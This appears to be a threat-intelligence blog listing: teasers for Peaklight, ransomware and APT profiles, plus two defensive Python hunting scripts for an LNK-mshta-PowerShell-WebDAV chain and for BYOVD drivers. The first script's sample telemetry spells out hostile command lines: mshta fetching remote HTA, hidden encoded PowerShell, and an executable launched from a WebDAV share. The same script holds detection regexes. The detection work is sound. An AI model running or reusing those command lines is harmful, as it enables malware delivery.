Peaklight malware: Stealthy memory-resident delivery chain abusing LNK, mshta, CDN and WebDAV
Tags: Peaklight malware deep dive, peaklight, emmenhtal, in-memory malware, lnk, mshta, powershell, bunnycdn, webdav, cryptbot, lumma, shadowladder, hijackloader, threat hunting, incident response, mitre att&ck
1. Executive Summary
Peaklight (also tracked as…
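A hunting script for the chain named in the title (LNK double-click, mshta fetching a remote HTA, a hidden or encoded PowerShell stage, and a WebDAV share reference), added here as an example rather than code from the Peaklight write-up. The events, hostnames and paths are constructed for the example; a real run would feed exported process-creation events (Sysmon Event ID 1 or EDR equivalents) into `hunt_chain()`.

```python
"""Hunt the LNK -> mshta -> PowerShell -> WebDAV delivery chain in process telemetry.

Added example, not the article's code. Events are constructed here in a Sysmon
Event ID 1-like shape (pid, ppid, image, cmdline)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed telemetry: one chain matching the delivery pattern and one benign mshta
# launch by an installed application. Hosts, paths and the base64 blob are invented.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://cdn.example.net/media/clip.mp4"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(2200, 2100, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c start \\203.0.113.10@80\DavWWWRoot\stage\update.exe"),
    ProcEvent(3000, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcEvent(3100, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -File "C:\Program Files\Vendor\helper.ps1"'),
]

URL_RE = re.compile(r"https?://", re.I)
# Common spellings of -EncodedCommand accepted by powershell.exe.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# \\host@SSL\, \\host@<port>\ and \DavWWWRoot\ are the WebClient (WebDAV) UNC idioms.
WEBDAV_RE = re.compile(r"\\\\[\w.\-]+@(?:SSL|\d+)\\|\\DavWWWRoot\\", re.I)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def hunt_chain(events):
    """Return one finding per mshta launch with a remote URL, listing the chain stages seen."""
    by_pid = {e.pid: e for e in events}
    by_parent = {}
    for e in events:
        by_parent.setdefault(e.ppid, []).append(e)

    findings = []
    for e in events:
        if basename(e.image) != "mshta.exe" or not URL_RE.search(e.cmdline):
            continue
        stages = [f"mshta pid {e.pid} fetching a remote HTA: {e.cmdline}"]
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) == "explorer.exe":
            stages.append("parent is explorer.exe (consistent with a double-clicked LNK)")
        # Walk the whole subtree: the PowerShell stage may sit one or more hops below mshta.
        stack = list(by_parent.get(e.pid, []))
        while stack:
            d = stack.pop()
            stack.extend(by_parent.get(d.pid, []))
            name = basename(d.image)
            if name in ("powershell.exe", "pwsh.exe") and (
                ENC_RE.search(d.cmdline) or HIDDEN_RE.search(d.cmdline)
            ):
                stages.append(f"descendant PowerShell pid {d.pid} with encoded/hidden command")
            if WEBDAV_RE.search(d.cmdline):
                stages.append(f"descendant pid {d.pid} references a WebDAV share")
        findings.append({"mshta_pid": e.pid, "stages": stages})
    return findings


if __name__ == "__main__":
    for finding in hunt_chain(SAMPLE_EVENTS):
        print(f"mshta pid {finding['mshta_pid']}:")
        for stage in finding["stages"]:
            print("  -", stage)
```

The benign chain (mshta opening a local `.hta`, then a PowerShell script file) produces no finding because the trigger is mshta with a remote URL, not mshta itself; the remaining stages only add weight. Replace the URL check with your own CDN and WebDAV indicator list when running this against real telemetry.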
Payload Ransomware: Early Profile
Tags: Payload ransomware, data broker extortion, double extortion, Tor leak site, ESXi ransomware, RECOVERY-xx0001.txt, IOCs, incident response
Published: 21 February 2026 (Europe/London)
1. Executive Summary
Payload is an emerging ransomware…
APT33 – Threat Actor Profile
Tags: APT33, Elfin, Peach Sandstorm, HOLMIUM, Refined Kitten, Iran, aerospace, energy, petrochemical, spearphishing, password spraying, Outlook Home Page, Ruler, TurnedUp, DropShot, ShapeShift, StoneDrill
1. Executive Summary
APT33 is a suspected Iranian…
BeyondTrust CVE-2026-1731: Pre-auth RCE escalates from rapid scanning to ransomware-linked intrusions
CISA has now flagged CVE-2026-1731, a critical, pre-authentication remote code execution flaw in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA), as being used in ransomware campaigns, signalling that exploitation…
Ivanti EPMM Pre-Auth RCE (CVE-2026-1281) Under Active Exploitation
Ivanti Endpoint Manager Mobile (EPMM) sits in a uniquely privileged position: it manages device enrollment, policy enforcement, and app/content distribution across entire mobile fleets. When an internet-facing EPMM server is…
EDR Killers in 2026: The most common ways attackers neutralize endpoint security — and how to stop them
Publish date: 21 February 2026
Category: Threat Intelligence / Defense Evasion / Endpoint Security
Tags: EDR, XDR, ransomware, defense evasion, BYOVD, Windows drivers, tamper protection, detection engineering
Executive summary
“EDR killers” are…
BYOVD in 2026: the signed-driver loophole powering EDR bypass at scale
Last updated: 21 February 2026 (Europe/London)
1. Executive Summary
Bring Your Own Vulnerable Driver (BYOVD) is a post-compromise technique where attackers load a legitimately signed (but vulnerable) kernel driver and…
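A host-side check for the technique described above, added here as an example and not code from the BYOVD article: it compares a host's loaded kernel drivers against a vulnerable-driver blocklist and additionally flags driver images loaded from user-writable directories, the usual drop location for a BYOVD payload. The inventory CSV and the blocklist entries are constructed for the example; on a real host the inventory would be built from `Get-CimInstance Win32_SystemDriver` (PathName), `Get-FileHash` and `(Get-Item <path>).VersionInfo.FileVersion`. The blocklist format is hypothetical and is not the Microsoft recommended driver block rules, which ship as WDAC XML whose hash rules are Authenticode hashes rather than flat-file SHA-256 and so cannot be compared to `Get-FileHash` output directly.

```python
"""BYOVD hunting: flag loaded drivers that match a vulnerable-driver blocklist or that were
loaded from a user-writable location. Added example; inventory and blocklist are constructed."""
import csv
import io
import ntpath

# Constructed inventory (not from a real host); hashes are placeholders.
INVENTORY_CSV = r"""module,path,version,sha256
disk,C:\Windows\System32\drivers\disk.sys,10.0.19041.1,1111111111111111111111111111111111111111111111111111111111111111
vulndrv,C:\Users\alice\AppData\Local\Temp\vulndrv.sys,1.9.0.0,2222222222222222222222222222222222222222222222222222222222222222
vendorx,C:\Windows\System32\drivers\vulndrv.sys,2.2.0.0,3333333333333333333333333333333333333333333333333333333333333333
oldtool,C:\ProgramData\oldtool.sys,3.0.0.0,4444444444444444444444444444444444444444444444444444444444444444
helper,C:\Windows\System32\drivers\helper.sys,1.0.0.0,5555555555555555555555555555555555555555555555555555555555555555
"""

# Hypothetical blocklist format (constructed). "max_version" bounds the vulnerable range
# inclusively; a name rule without it blocks every version; a sha256 rule matches the
# flat-file hash regardless of the on-disk name.
BLOCKLIST = [
    {"name": "vulndrv.sys", "max_version": "2.1.0.0", "why": "arbitrary kernel R/W IOCTL (example)"},
    {"name": "oldtool.sys", "why": "all versions vulnerable (example)"},
    {"sha256": "55" * 32, "why": "known BYOVD sample by hash (example)"},
]

# Kernel drivers legitimately live under System32\drivers; these prefixes are writable by users.
SUSPICIOUS_DIRS = ("\\users\\", "\\programdata\\", "\\temp\\")


def parse_version(text):
    """'1.9.0.0' -> (1, 9, 0, 0); shorter strings are right-padded with zeros."""
    parts = [int(p) for p in text.strip().split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0, 0])[:4])


def blocklist_reasons(row):
    """Reasons a single inventory row matches the blocklist (empty list if clean)."""
    name = ntpath.basename(row["path"]).lower()
    reasons = []
    for rule in BLOCKLIST:
        if "sha256" in rule:
            if rule["sha256"].lower() == row["sha256"].lower():
                reasons.append(f"hash match: {rule['why']}")
        elif rule.get("name") == name:
            ceiling = rule.get("max_version")
            if ceiling is None or parse_version(row["version"]) <= parse_version(ceiling):
                reasons.append(f"name/version match ({row['version']}): {rule['why']}")
    return reasons


def suspicious_path(path):
    p = path.lower()
    return any(d in p for d in SUSPICIOUS_DIRS)


def hunt(inventory_csv=INVENTORY_CSV):
    """Return findings (module, path, reasons) for every driver worth a second look."""
    findings = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        reasons = blocklist_reasons(row)
        if suspicious_path(row["path"]):
            reasons.append("driver image loaded from a user-writable directory")
        if reasons:
            findings.append({"module": row["module"], "path": row["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt():
        print(finding["module"], finding["path"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Note the `vendorx` row: the same driver name at a version above the vulnerable ceiling is not flagged, which is the behaviour you want once a vendor has shipped a fix. Name rules match the on-disk filename, so a renamed copy of a vulnerable driver slips past them; hash rules and the load-path heuristic are what catch that case.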
APT29 (Cozy Bear / The Dukes / Midnight Blizzard) – Threat Actor Profile
APT29, also known as Cozy Bear, is a Russian hacker group believed to be affiliated with one or more Russian intelligence agencies. The group has been operating for the Russian…
APT28 (Fancy Bear / Sofacy / Sednit / Forest Blizzard) – Threat Actor Profile
1. Executive Summary
APT28 is a long-running Russian state-aligned cyber espionage actor widely attributed to the GRU’s 85th Main Special Service Center (GTsSS), military unit 26165, active since at least…
APT31 (Violet Typhoon / ZIRCONIUM) – Threat Actor Profile
At-a-glance
Attribute | Assessment
Primary tracking name | APT31 (widely used in government and industry reporting) (Department of Justice)
Notable aliases | Violet Typhoon / ZIRCONIUM (Microsoft), JUDGMENT PANDA (CrowdStrike) (Microsoft Learn)
Suspected…
